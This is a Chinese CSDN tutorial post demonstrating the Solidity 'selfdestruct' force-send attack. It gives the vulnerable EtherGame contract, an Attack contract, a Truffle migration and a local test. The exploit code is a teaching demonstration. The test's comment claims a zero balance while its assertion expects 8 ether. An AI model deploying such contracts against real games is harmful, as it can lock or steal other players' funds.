truffle实现自毁攻击

于 2024-05-15 17:11:49 发布
阅读量325 收藏 7
点赞数 5
分类专栏: truffle测试 文章标签: 区块链 单元测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40083796/article/details/138915641
版权 
pragma solidity ^0.8.3;

contract EtherGame {
    uint public targetAmount = 7 ether;
    address public winner;

    function deposit() public payable {
        require(msg.value == 1 ether, "You can only send 1 Ether");
        uint balance = address(this).balance;
        require(balance <= targetAmount, "Game is over");
        if (balance == targetAmount) {
            winner = msg.sender;
        }
    }

    function claimReward() public {
        require(msg.sender == winner, "Not winner");
        (bool sent, ) = msg.sender.call{value: address(this).balance}("");
        require(sent, "Failed to send Ether");
    }
}

contract Attack {
    EtherGame etherGame;

    constructor(EtherGame _etherGame) {
        etherGame = EtherGame(_etherGame);
    }

    function attack() public payable {
        address payable addr = payable(address(etherGame));
        selfdestruct(addr);
    }
}

原理 https://www.bilibili.com/video/BV1fD4y147KH/?spm_id_from=333.337.search-card.all.click&vd_source=6b4d28b3ec049dc8e02778a8e88d78ff
迁移文件

const EtherGame = artifacts.require("EtherGame");
const Attack = artifacts.require("Attack");

module.exports = async function (deployer, network, accounts) {
    await deployer.deploy(EtherGame);
    const a = await EtherGame.deployed();
    await deployer.deploy(Attack, a.address);

}

测试用例

const etherGame = artifacts.require("EtherGame")
const attack = artifacts.require("Attack")
contract("EtherGame", async (accounts) => {
    it("", async () => {
        const EtherGameinstance = await etherGame.deployed();
        await EtherGameinstance.deposit({ from: accounts[0], value: web3.utils.toWei("1", "ether") });
        const AttackInstance = await attack.deployed();
        // 使用攻击合约尝试攻击 EtherGame 合约
        await AttackInstance.attack({ from: accounts[0], value: web3.utils.toWei("7", "ether") });
        // 断言攻击成功后,EtherGame 合约余额为 0
        const newContractBalance = await web3.eth.getBalance(EtherGameinstance.address);
        assert.equal(newContractBalance, web3.utils.toWei("8", "ether"));
    })
})
qq_40083796
关注
专栏目录
26. solidity 删除合约:selfdestruct
一个字,学
03-29 540
命令可以用来删除智能合约,并将该合约剩余ETH转到指定地址。是为了应对合约出错的极端情况而设计的。它最早被命名为suicide(自杀),但是这个词太敏感。为了保护抑郁的程序员,改名为。是智能合约的紧急按钮,销毁合约并将剩余ETH转移到指定账户。当著名的The DAO攻击发生时,以太坊的创始人们一定后悔过没有在合约里加入来停止黑客的攻击吧。
智能合约安全漏洞Truffle工具使用流程,以及钱包合约漏洞攻击示例
最新发布
weixin_74278203的博客
02-01 707
关于如何使用Truffle工具对智能合约安全漏洞进行测试流程,以及钱包合约漏洞攻击示例
Self Destruct
颜宁的博客
02-09 377
Contracts can be deleted from the blockchain by callingselfdestruct. selfdestructsends all remaining Ether stored in the contract to a designated address. Vulnerability A malicious contract can useselfdestructto force sending Ether to any contract. ...
047.Solidity入门——34自毁合约
qq_35369459的博客
03-02 625
Solidity——自毁合约
Solidity-自毁
皓阳当空-博客
08-25 2237
一:自毁 selfdestruct(address recipient): 销毁当前合约,并且把当前合约的余额发送指定地址 二:实例 pragma solidity ^0.4.18; contract selfdestructDemo{ uint internal u = 10; function test() returns(uint){ retu...
truffle_demo_truffle实现智能合约_
09-29
通过前端页面,可以调用智能合约。truffle是开发框架,前端是React,后端是Node.js。
truffle-develop:实现以太坊主链制作交易所转账和代币转账
05-10
在这个项目中,我们关注的是如何使用Node.js通过Truffle框架来与以太坊主链及测试链进行交互,实现转账和代币转账的功能。以下是对这个项目的关键知识点的详细解释。 首先,`truffle-develop`是一个Truffle开发环境...
Truffle quick start guide
10-16
Truffle is a world-class development environment, testing framework and asset pipeline for Ethereum, aiming to make life as an Ethereum developer easier. If you are a web developer wanting to try your...
jq-quarkus:用Truffle在GraalVM的Quarkus应用程序中实现的jq
03-28
使用GraalVM的实现 使用Quarkus构建一个项目,并以本地方式调用该语言。 端点示例: @POST @Path ( " jq " ) @Consumes ( MediaType . APPLICATION_JSON ) @Produces ( MediaType . TEXT_PLAIN ) public ...
truffle-typechain-example:示例如何将Truffle套件与Typescript和Typechain一起使用
05-17
示例如何将Truffle套件与Typescript和Typechain一起使用 用法: 只需运行yarn generate即可编译智能合约并为合同生成初始TS包装器。 然后进行yarn test 每次更改合同时,都需要运行yarn generate 。 设置 安装...
十大DeFi安全实践
ChainlinkO的博客
01-23 5181
从可重入攻击到价格预言机漏洞利用,以下是作为DeFi开发人员需要注意的漏洞以及用于保护dApp的成熟解决方案。
WTF Solidity极简入门: 35. 荷兰拍卖
快活林高老大--编码30年
12-05 765
这一讲,我将介绍荷兰拍卖,并通过简化版Azuki荷兰拍卖代码,讲解如何通过荷兰拍卖发售ERC721标准的NFT。
Solidity极简入门#26. 删除合约
sleep的博客
03-09 524
selfdestruct是智能合约的紧急按钮,销毁合约并将剩余ETH转移到指定账户。当著名的The DAO攻击发生时,以太坊的创始人们一定后悔过没有在合约里加入selfdestruct来停止黑客的攻击吧。
Solidity:合约销毁(SelfDestruct)
runrundream的博客
09-23 3754
以太坊Solidity智能合约销毁
区块链 以太坊 智能合约 如何销毁 废弃 selfdestruct
软件工程小施同学 的专栏
01-17 4056
pragma solidity ^0.4.4; contract Counter { uint count = 0; // 函数拥有者 address owner; // 构造函数(constructor)来初始化合约对象 // 构造函数就是方法名和合约名字相同的函数 // 创建合约时会调用构造函数对状态变量进行数据初始化操作。 // 同一个合约同时只能拥有一个构造函数 function Counter() { ...
区块链100讲:Solidity语法难点解析及故障排查
HiBlock的博客
07-20 3132
1 编辑器说明 1、推荐编辑器 目前尝试 Solidity 编程的最好的方式是使用 Remix(https://remix.ethereum.org/) (需要时间加载,请耐心等待)。Remix 是一个基于 Web 的 IDE,它可以让你编写 Solidity 智能合约,然后部署并运行该智能合约。 如果外网不能访问,可以访问欧阳哥哥搭建的REMIX编辑器(http://remi...
区块链黑客第二讲: 自毁攻击
weixin_52628792的博客
11-04 1259
本章讲解智能合约的自毁攻击,以及如何利用自毁攻击来造成安全威胁!
cka教程_区块链入门教程solidity函数详解
weixin_34902900的博客
12-23 315
兄弟连教育分享区块链入门教程solidity函数详解“区块链+时代无疑会是下一个风口,然而现在的区块链行业专业型人才正在遭遇瓶颈”兄弟连教育区块链培训学院院长尹成表示,“希望能通过兄弟连教育区块链学院为社会为企业培养并输送更多优质的区块链高精尖型技术人才。()1.Solidity函数、权限、函数修饰符、事件a.函数i.概念:solidity也是一门函数式编程语言,函数可以做为其参数、变量、返回值i...
使用Truffle与Infura部署以太坊智能合约教程
"本教程详细介绍了如何使用Truffle和Infura部署以太坊智能合约,适合以太坊DApp开发初学者。由汇智网创作的电子书涵盖了以太坊合约开发、IPFS去中心化文件系统、链下MongoDB存储等内容,并提供了在线交互式实战课程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值